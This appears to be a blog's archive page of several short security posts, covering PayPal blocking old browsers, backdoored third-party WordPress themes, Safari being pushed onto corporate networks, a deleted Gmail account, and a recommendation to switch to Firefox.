security

I'm not a fan of PayPal, with its poor customer service (which is a huge deal when it comes to handling money), but I'm with them on this:

Web payment firm Paypal has said it will block "unsafe browsers" from using its service as part of wider anti-phishing efforts....

...Paypal said it was "an alarming fact that there is a significant set of users who use very old and vulnerable browsers such as Internet Explorer 4"....

...Paypal said some users were still using Internet Explorer 3 , released more than 10 years ago.

IE3?? Holy cow! I don't even think that's loaded on my old IBM Intellistation that's collecting dust in the corner.

Here's a surprise to me:

Paypal said it supported the use of Extended Validation SSL Certificates....

...The latest version of Internet Explorer support EV SSL certificates, while Firefox 2 supports it with an add-on but Apple's Safari browser for Mac and PCs does not.

(Emphasis added.)

Via GigaOM:

Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted....

...There are lots of reasons a hacker may want to inject code into a page:

• To infect visitors by exploiting a browser vulnerability
• To place ads they can then get revenue from
• To embed links to blogs they own, improving their page rank
• To entice people to click on links that lead them elsewhere

The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly.

It's all too easy to compromise a website's security via the theming layer. Malice is just one possibility. There are also hacks and vulnerable code gimmicks pursued amateur theme developers who just don't know better. It's not just a Wordpress thing -- it's all websites, whether built on open source or proprietary platforms (though not static html sites, which presumably are as safe as their servers).

In this context, the question for the website owner is whether you want to buy a theme (or download a free one) from an un-vetted vendor. Sure, if you are an adept coder, and/or know the proper API calls to protect your site from things like XSS, you can just clean that up and enjoy the design that attracted you in the first place. But if you don't know those vulnerabilities, you could be opening your site up to ill-will or novice mistakes. Caveat emptor. Don't end up like Deep Jive. Ouch.

Via MacWorld:

“This is not good; this is a security risk,” he said. “We’re a bank.”

Wilson said it has taken him the better part of a week to remove Safari from his network and prevent it from being reinstalled.

In an e-mail interview, Susan Bradley agreed that the updates are creating a problem for administrators and making users less secure. “It impacts all of us when more potential attack surface is installed in a group of folks that are vulnerable enough as it is,” said Bradley, who is chief technology officer with Tamiyasu, Smith, Horn and Braun, Accountancy Corp.

Of course I don't have any stats, but I wonder how many of these IT folks are the same ones keeping IE6 alive.

In short:

You don't own it = you don't control it.

If your stuff is on someone else's turf, you have to realize that you are at an inherent disadvantage when conflict arises. They say possession is 9/10ths of the law. That is as true on the internet as it is in the "real world."

Consider Bob, who discovered that Google went and deleted his entire GMail account without warning.

...By then I sensed that something was terribly wrong, as the Google folks rarely took > 12 hours to fix such a problem. I accessed the Google Accounts page (www.google.com/accounts/), and saw the following message:

The account you attempted to access has been deleted. You may click here to sign up for a new account.

A nightmare come true?! I tried logging into my Google Account via www.google.com/accounts/Login but was presented with an invalid username/password error.

I tried to reset my password, and my suspicions were confirmed when I saw the following:

There are no accounts in our system with the E-mail address usermame@gmail.com which you entered.

When he got Google to investigate, their response was rather underwhelming:

Hello,

Thank you for your report.

We have investigated this issue, but because the results were inconclusive, we're not able to provide further assistance.

Gmail takes the privacy and security of our users very seriously. For this reason, we can't reveal any further information about this account.

We apologize for any inconvenience this may have caused, and thank you for your cooperation.

Sincerely,

The Google Team

On a carryover thread, Jim asks:

This is a weird suggestion, but... have you tied going through consumer advocates, such as Consumer Reports, the BBB or even better one of those "Channel 7 On Your Side!" news features where the news reporter will help investigate the problem and hopefully get the issue resolved?

Often big companies won't listen to one person, unless that one person has a major news organization backing him up ready to write a story about it.

And there's the rub. How much clout does one person have against a megacorporation?

In the same thread, several people point out that GMail is free, and therefore Bob has no cause to complain. I disagree. For one thing, GMail isn't free: the user has to give up a degree of privacy to allow Google to place targeted ads into their email. Second, free services offered to the public should be at the very least reliable. It's not like GMail is open source, supported by volunteers. If you're saying, "Here's something to replace your other thing," and then it doesn't perform to minimal requirements (such as no arbitrary deletions of all material), well, there's a problem.

To be sure, any system can fail. But it's something else when the problem is a conflict of intention.

Hat tip: Hawk Wings, my favorite source of Apple Mail tips, who points to an essential part of the Google terms of service:

We may modify or terminate our services from time to time, for any reason, and without notice, including the right to terminate with or without notice, without liability to you, any other user or any third party. We reserve the right to modify these Terms of Service from time to time without notice…

…Google disclaims any and all responsibility or liability for the accuracy, content, completeness, legality, reliability, or operability or availability of information or material displayed in the GOOGLE SERVICES results. Google disclaims any responsibility for the deletion, failure to store, misdelivery, or untimely delivery of any information or material.

That's "Do no evil" in legalese.

If you haven't been running one of the release candidates already, you may want to get the latest and perhaps best browser to date, Firefox 1.5, now that it's been officially released. And really, if you're using another browser -- especially the buggy and unsafe Internet Explorer -- you owe it to yourself to at least try Firefox, which is safer for your machine.

That's reason one.

As a designer, Firefox is a pleasurable development in the online world. I can't speak for others, but I think websites look better in Firefox. Meanwhile, Internet Explorer, thanks to Microsoft's defiance of web standards, continues to be a nightmare for web designers who waste additional hours upon hours to hack all the Internet Explorer quirks in CSS so that IE doesn't break the website altogether.

That's the other half of a reason. Actually, it's another full reason, in my book, but how can aesthetics trump security? So as a computer person, I urge you to switch to Firefox browser as a step towards increased security. As a designer, I beg you, please, help make IE just fade away. Please!